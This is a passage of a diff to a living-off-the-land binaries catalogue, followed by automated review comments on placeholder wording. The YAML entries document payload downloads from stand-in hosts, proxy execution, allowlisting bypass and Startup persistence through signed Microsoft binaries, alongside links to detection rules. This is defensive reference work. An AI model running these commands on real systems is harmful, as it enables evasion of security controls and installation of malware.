@@ -101,7 +101,7 @@ Commands: Tags: - Execute: Nuget - Execute: Remote - - Command: Update.exe --processStart payload.exe --process-start-args "whatever args" + - Command: Update.exe --processStart {PATH:.exe} --process-start-args "{CMD:args}" Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied. Usecase: Execute binary Category: Execute @@ -110,8 +110,8 @@ Commands: OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - Execute: CMD - - Command: Update.exe --createShortcut=payload.exe -l=Startup - Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it. + - Command: Update.exe --createShortcut={PATH:.exe} -l=Startup + Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a shortcut to the specified executable in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it. Usecase: Execute binary Category: Execute Privileges: User @@ -119,7 +119,7 @@ Commands: OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - Execute: EXE - - Command: Update.exe --removeShortcut=payload.exe -l=Startup + - Command: Update.exe --removeShortcut={PATH:.exe}-l=Startup Description: Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page. Usecase: Execute binary Category: Execute diff --git a/yml/OtherMSBinaries/VSDiagnostics.yml b/yml/OtherMSBinaries/VSDiagnostics.yml index 1713678..d24327f 100644 --- a/yml/OtherMSBinaries/VSDiagnostics.yml 
+++ b/yml/OtherMSBinaries/VSDiagnostics.yml @@ -4,7 +4,7 @@ Description: Command-line tool used for performing diagnostics. Author: Bobby Cooke Created: 2023-07-12 Commands: - - Command: VSDiagnostics.exe start 1 /launch:calc.exe + - Command: VSDiagnostics.exe start 1 /launch:{PATH:.exe} Description: Starts a collection session with sessionID 1 and calls kernelbase.CreateProcessW to launch specified executable. Usecase: Proxy execution of binary Category: Execute @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - - Command: VSDiagnostics.exe start 2 /launch:cmd.exe /launchArgs:"/c calc.exe" + - Command: VSDiagnostics.exe start 2 /launch:{PATH:.exe} /launchArgs:"{CMD:args}" Description: Starts a collection session with sessionID 2 and calls kernelbase.CreateProcessW to launch specified executable. Arguments specified in launchArgs are passed to CreateProcessW. Usecase: Proxy execution of binary with arguments Category: Execute diff --git a/yml/OtherMSBinaries/VSIISExeLauncher.yml b/yml/OtherMSBinaries/VSIISExeLauncher.yml index 86d34a9..591647f 100644 --- a/yml/OtherMSBinaries/VSIISExeLauncher.yml +++ b/yml/OtherMSBinaries/VSIISExeLauncher.yml @@ -1,10 +1,10 @@ --- Name: VSIISExeLauncher.exe Description: Binary will execute specified binary. Part of VS/VScode installation. -Author: 'timwhite' +Author: timwhite Created: 2021-09-24 Commands: - - Command: VSIISExeLauncher.exe -p [PATH_TO_BIN] -a "argument here" + - Command: VSIISExeLauncher.exe -p {PATH:.exe} -a "{CMD:args}" Description: The above binary will execute other binary. Usecase: Execute any binary with given arguments. Category: Execute 
@@ -15,8 +15,6 @@ Commands: - Execute: EXE Full_Path: - Path: 'C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\Web Tools\ProjectSystem\VSIISExeLauncher.exe' -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml - IOC: VSIISExeLauncher.exe spawned an unknown process @@ -24,4 +22,3 @@ Resources: - Link: https://github.com/timwhitez Acknowledgement: - Person: timwhite - Handle: diff --git a/yml/OtherMSBinaries/Visio.yml b/yml/OtherMSBinaries/Visio.yml index 2c141e5..fedb32a 100644 --- a/yml/OtherMSBinaries/Visio.yml +++ b/yml/OtherMSBinaries/Visio.yml @@ -4,7 +4,7 @@ Description: Microsoft Visio Executable Author: Avihay Eldad Created: 2024-02-15 Commands: - - Command: Visio.exe https://example.com/payload + - Command: Visio.exe {REMOTEURL} Description: Downloads payload from remote server Usecase: It will download a remote payload and place it in INetCache. Category: Download diff --git a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml index ed91900..da3c036 100644 --- a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml +++ b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml @@ -17,8 +17,6 @@ Full_Path: - Path: c:\Program Files (x86)\Windows Kits\10\bin\\arm64\UIAVerify\VisualUiaVerifyNative.exe - Path: c:\Program Files (x86)\Windows Kits\10\bin\\x64\UIAVerify\VisualUiaVerifyNative.exe - Path: c:\Program Files (x86)\Windows Kits\10\bin\\UIAVerify\VisualUiaVerifyNative.exe -Code_Sample: - - Code: Detection: - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - Sigma: https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml 
diff --git a/yml/OtherMSBinaries/VsLaunchBrowser.yml b/yml/OtherMSBinaries/VsLaunchBrowser.yml index 578464c..4332e3a 100644 --- a/yml/OtherMSBinaries/VsLaunchBrowser.yml +++ b/yml/OtherMSBinaries/VsLaunchBrowser.yml @@ -4,7 +4,7 @@ Description: Microsoft Visual Studio browser launcher tool for web applications Author: Avihay Eldad Created: 2024-04-12 Commands: - - Command: VSLaunchBrowser.exe .exe http://example.com/payload + - Command: VSLaunchBrowser.exe .exe {REMOTEURL:.exe} Description: Download and execute payload from remote server Usecase: It will download a remote file to INetCache and open it using the default app associated with the supplied file extension with VSLaunchBrowser as parent process. Category: Download @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows Tags: - Download: INetCache - - Command: VSLaunchBrowser.exe .exe C:\Windows\System32\calc.exe + - Command: VSLaunchBrowser.exe .exe {PATH_ABSOLUTE:.exe} Description: Execute payload via VSLaunchBrowser as parent process Usecase: It will open a local file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process. Category: Execute @@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows Tags: - Execute: EXE - - Command: VSLaunchBrowser.exe .exe \\Server\Path\file + - Command: VSLaunchBrowser.exe .exe {PATH_SMB} Description: Execute payload from WebDAV server via VSLaunchBrowser as parent process Usecase: It will open a remote file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process. Category: Execute diff --git a/yml/OtherMSBinaries/Vshadow.yml b/yml/OtherMSBinaries/Vshadow.yml index 36c743d..a463f2a 100644 --- a/yml/OtherMSBinaries/Vshadow.yml +++ b/yml/OtherMSBinaries/Vshadow.yml 
@@ -4,8 +4,8 @@ Description: VShadow is a command-line tool that can be used to create and manag Author: Ayberk HalaƧ Created: 2023-09-06 Commands: - - Command: 'vshadow.exe -nw -exec=c:\windows\system32\calc.exe C:' - Description: Executes calc.exe from vshadow.exe. + - Command: 'vshadow.exe -nw -exec={PATH_ABSOLUTE:.exe} C:' + Description: Executes specified executable from vshadow.exe. Usecase: Performs execution of specified executable file. Category: Execute Privileges: Administrator diff --git a/yml/OtherMSBinaries/Vsjitdebugger.yml b/yml/OtherMSBinaries/Vsjitdebugger.yml index e6fb2f3..f3de11a 100644 --- a/yml/OtherMSBinaries/Vsjitdebugger.yml +++ b/yml/OtherMSBinaries/Vsjitdebugger.yml @@ -1,11 +1,11 @@ --- Name: vsjitdebugger.exe Description: Just-In-Time (JIT) debugger included with Visual Studio -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: Vsjitdebugger.exe calc.exe - Description: Executes calc.exe as a subprocess of Vsjitdebugger.exe. + - Command: Vsjitdebugger.exe {PATH:.exe} + Description: Executes specified executable as a subprocess of Vsjitdebugger.exe. Usecase: Execution of local PE file as a subprocess of Vsjitdebugger.exe. Category: Execute Privileges: User @@ -15,8 +15,6 @@ Commands: - Execute: EXE Full_Path: - Path: c:\windows\system32\vsjitdebugger.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml Resources: diff --git a/yml/OtherMSBinaries/Wfc.yml b/yml/OtherMSBinaries/Wfc.yml index 40dd205..a281897 100644 --- a/yml/OtherMSBinaries/Wfc.yml +++ b/yml/OtherMSBinaries/Wfc.yml 
@@ -4,7 +4,7 @@ Description: The Workflow Command-line Compiler tool is included with the Window Author: Jimmy (@bohops) Created: 2021-09-26 Commands: - - Command: wfc.exe c:\path\to\test.xoml + - Command: wfc.exe {PATH_ABSOLUTE:.xoml} Description: Execute arbitrary C# code embedded in a XOML file. Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies Category: AWL Bypass diff --git a/yml/OtherMSBinaries/Winproj.yml b/yml/OtherMSBinaries/Winproj.yml index 4ceaf24..8e6f844 100644 --- a/yml/OtherMSBinaries/Winproj.yml +++ b/yml/OtherMSBinaries/Winproj.yml @@ -4,7 +4,7 @@ Description: Microsoft Project Executable Author: Avihay Eldad Created: 2024-02-14 Commands: - - Command: WinProj.exe https://example.com/payload + - Command: WinProj.exe {REMOTEURL} Description: Downloads payload from remote server Usecase: It will download a remote payload and place it in INetCache. Category: Download diff --git a/yml/OtherMSBinaries/Winword.yml b/yml/OtherMSBinaries/Winword.yml index dddff5e..4c1cbc9 100644 --- a/yml/OtherMSBinaries/Winword.yml +++ b/yml/OtherMSBinaries/Winword.yml @@ -4,7 +4,7 @@ Description: Microsoft Office binary Author: 'Reegun J (OCBC Bank)' Created: 2019-07-19 Commands: - - Command: winword.exe "http://192.168.1.10/TeamsAddinLoader.dll" + - Command: winword.exe {REMOTEURL} Description: Downloads payload from remote server Usecase: It will download a remote payload and place it in INetCache. Category: Download diff --git a/yml/OtherMSBinaries/Wsl.yml b/yml/OtherMSBinaries/Wsl.yml index 92970b5..472374a 100644 --- a/yml/OtherMSBinaries/Wsl.yml +++ b/yml/OtherMSBinaries/Wsl.yml @@ -1,7 +1,7 @@ --- Name: Wsl.exe Description: Windows subsystem for Linux executable -Author: 'Matthew Brown' +Author: Matthew Brown Created: 2019-06-27 Commands: - Command: wsl.exe -e /mnt/c/Windows/System32/calc.exe 
@@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows 10, Windows Server 2019, Windows 11 Tags: - Execute: CMD - - Command: wsl.exe --exec bash -c "" + - Command: wsl.exe --exec bash -c "{CMD}" Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u `) on the default WSL distro (unless stated otherwise using `-d `) Usecase: Performs execution of arbitrary Linux commands. Category: Execute @@ -40,8 +40,6 @@ Commands: OperatingSystem: Windows 10, Windows Server 2019, Windows 11 Full_Path: - Path: C:\Windows\System32\wsl.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wsl_lolbin_execution.yml - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules diff --git a/yml/OtherMSBinaries/vsls-agent.yml b/yml/OtherMSBinaries/vsls-agent.yml index 817ef21..9e6c9ab 100644 --- a/yml/OtherMSBinaries/vsls-agent.yml +++ b/yml/OtherMSBinaries/vsls-agent.yml @@ -4,7 +4,7 @@ Description: Agent for Visual Studio Live Share (Code Collaboration) Author: Jimmy (@bohops) Created: 2022-11-01 Commands: - - Command: vsls-agent.exe --agentExtensionPath c:\path\to\payload.dll + - Command: vsls-agent.exe --agentExtensionPath {PATH_ABSOLUTE:.dll} Description: Load a library payload using the --agentExtensionPath parameter (32-bit) Usecase: Execute proxied payload with Microsoft signed binary Category: Execute diff --git a/yml/OtherMSBinaries/vstest.console.yml b/yml/OtherMSBinaries/vstest.console.yml index c476fec..2bb45a2 100644 --- a/yml/OtherMSBinaries/vstest.console.yml +++ b/yml/OtherMSBinaries/vstest.console.yml 
@@ -4,7 +4,7 @@ Description: VSTest.Console.exe is the command-line tool to run tests Author: Onat Uzunyayla Created: 2023-09-08 Commands: - - Command: vstest.console.exe testcode.dll + - Command: vstest.console.exe {PATH:.dll} Description: VSTest functionality may allow an adversary to executes their malware by wrapping it as a test method then build it to a .exe or .dll file to be later run by vstest.console.exe. This may both allow AWL bypass or defense bypass in general Usecase: Proxy Execution and AWL bypass, Adversaries may run malicious code embedded inside the test methods of crafted dll/exe Category: AWL Bypass diff --git a/yml/OtherMSBinaries/winfile.yml b/yml/OtherMSBinaries/winfile.yml index 91c83a7..dccea98 100644 --- a/yml/OtherMSBinaries/winfile.yml +++ b/yml/OtherMSBinaries/winfile.yml @@ -4,7 +4,7 @@ Description: Windows File Manager executable Author: Avihay Eldad Created: 2024-04-30 Commands: - - Command: winfile.exe calc.exe + - Command: winfile.exe {PATH:.exe} Description: Execute an executable file with WinFile as a parent process. Usecase: Performs execution of specified file, can be used as a defense evasion Category: Execute diff --git a/yml/OtherMSBinaries/xsd.yml b/yml/OtherMSBinaries/xsd.yml index 435807e..37cfdc9 100644 --- a/yml/OtherMSBinaries/xsd.yml +++ b/yml/OtherMSBinaries/xsd.yml @@ -4,7 +4,7 @@ Description: XML Schema Definition Tool included with the Windows Software Devel Author: Avihay Eldad Created: 2024-04-09 Commands: - - Command: xsd.exe http://example.com/payload + - Command: xsd.exe {REMOTEURL} Description: Downloads payload from remote server Usecase: It will download a remote payload and place it in INetCache Category: Download
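Review bot: the `--removeShortcut` line in Update.yml (hunk `@@ -119,7 +119,7 @@`) lost the space between the placeholder and the `-l=Startup` switch: `- Command: Update.exe --removeShortcut={PATH:.exe}-l=Startup`. The removed line read `--removeShortcut=payload.exe -l=Startup`, so this is a regression introduced by the substitution, and anything that expands the placeholder will glue `-l=Startup` onto the path. Suggest `Update.exe --removeShortcut={PATH:.exe} -l=Startup`, matching the `--createShortcut={PATH:.exe} -l=Startup` entry in the hunk just above it.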
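Review bot: in Teams.yml (hunk `@@ -22,7 +22,7 @@`) the command is generalised to `--gpu-launcher="{CMD} &&"` but the unchanged Description still reads `Teams spawns cmd.exe as a child process of teams.exe and executes the ping command`, which describes the removed `cmd.exe /c ping google.com` value rather than the placeholder. Reword it to what the placeholder now expresses (for example `Teams spawns the specified command as a child process of teams.exe`), as this patch already does for Remote.exe, Vshadow and Vsjitdebugger, whose Descriptions were updated alongside the command.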
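Review bot: the two `--processStart {PATH:.exe}` entries in Update.yml (hunks `@@ -71,7 +71,7 @@` and `@@ -101,7 +101,7 @@`) pair an arbitrary-path placeholder with a Description that requires the file to be copied into `%userprofile%\AppData\Local\Microsoft\Teams\current\` first. The removed value was a bare file name (`payload.exe`), which is what that directory constraint implies; `{PATH:.exe}` reads as "any path" and so contradicts the prose. Either use a placeholder form that conveys a file name inside that folder, or add a sentence to the Description stating that the argument is resolved relative to the Teams `current` directory. The `--createShortcut={PATH:.exe}` entry in hunk `@@ -110,8 +110,8 @@` has the same mismatch with its `%localappdata%\Microsoft\Teams\current\` sentence.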
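Review bot: Tracker.yml (hunks `@@ -1,10 +1,10 @@` and `@@ -13,7 +13,7 @@`) generalises the DLL argument to `{PATH:.dll}` but leaves the host process hard-coded as `/c C:\Windows\write.exe` in both commands. Given that the Usecase says `Injection of locally stored DLL file into target process` and the PR's purpose is to replace literal paths with placeholders, the `/c` argument is a candidate for `{PATH_ABSOLUTE:.exe}` as well; if write.exe is kept deliberately as a known-working example, a short note in the Description saying so would stop the next contributor from "fixing" it.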
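Review bot: the three VsLaunchBrowser.yml hunks use placeholders of uneven precision: `{REMOTEURL:.exe}` (`@@ -4,7 +4,7 @@`) and `{PATH_ABSOLUTE:.exe}` (`@@ -13,7 +13,7 @@`) carry the extension hint, but the third command in `@@ -22,7 +22,7 @@` is bare `{PATH_SMB}` even though its first argument is still `.exe` and its Description says the file is opened with the app associated with the supplied extension. Suggest `{PATH_SMB:.exe}` for consistency. Separately, that third entry's Description says `Execute payload from WebDAV server` while the placeholder says SMB; the removed literal `\\Server\Path\file` fit either, so decide which transport the entry is documenting and align placeholder and prose.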
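Review bot: in Wsl.yml the context line `- Command: wsl.exe -e /mnt/c/Windows/System32/calc.exe` (hunk `@@ -1,7 +1,7 @@`) keeps a literal calc.exe while the neighbouring command in `@@ -22,7 +22,7 @@` was generalised to `wsl.exe --exec bash -c "{CMD}"`. None of the placeholders used elsewhere in this patch (`{PATH_ABSOLUTE:.exe}` etc.) expresses the `/mnt/c/...` Linux-mount form, so either introduce one, or leave the literal and say in the Description why a mount-style path is required. In the same `@@ -22,7 +22,7 @@` hunk, the Description's `-u ` and `-d ` options appear with nothing after them in the diff as shown here; check whether an argument name (the user and the distro) was lost from that sentence.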
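Review bot: two pre-existing defects in Sqltoolsps.yml sit right next to the changed lines and are worth fixing in the same pass: the context line `Description: Tool included with Microsoft SQL that loads SQL Server cmdlts.` (hunk `@@ -1,10 +1,10 @@`) misspells `cmdlets`, and the only `Full_Path` entry for the SQLToolsPS.exe record (hunk `@@ -15,8 +15,6 @@`) is `C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe`, i.e. the sqlps.exe path rather than SQLToolsPS.exe's own, so the record's `Name` and `Full_Path` disagree. Neither is caused by this PR, but the file is already being edited.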
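Review bot: every file in this region of the patch also drops the empty `Code_Sample:` / `- Code:` block (for example Remote.exe `@@ -35,8 +35,6 @@`, Sqldumper `@@ -21,8 +21,6 @@`, Vsjitdebugger `@@ -15,8 +15,6 @@`, Wsl `@@ -40,8 +40,6 @@`) and VSIISExeLauncher.yml removes the empty `- Handle:` under `Acknowledgement` (`@@ -24,4 +22,3 @@`). Those are schema cleanups rather than path or URL generalisation, so they should be mentioned in the PR description, and whatever validates or renders these YAML files must already treat `Code_Sample` and `Handle` as optional keys, otherwise the merge breaks the build for every touched file at once. Related, the `Author` quoting is being unified (`'Oddvar Moe'` to `Oddvar Moe`, likewise `timwhite` and `Matthew Brown`) but `Author: 'Reegun J (OCBC Bank)'` in Winword.yml and `Author: 'Reegun J (OCBC Bank) - @reegun21'` in Squirrel.yml keep their quotes; neither value needs quoting as a YAML plain scalar (parentheses and a mid-string `@` are fine), so either strip those too or state that only the single-word authors were in scope.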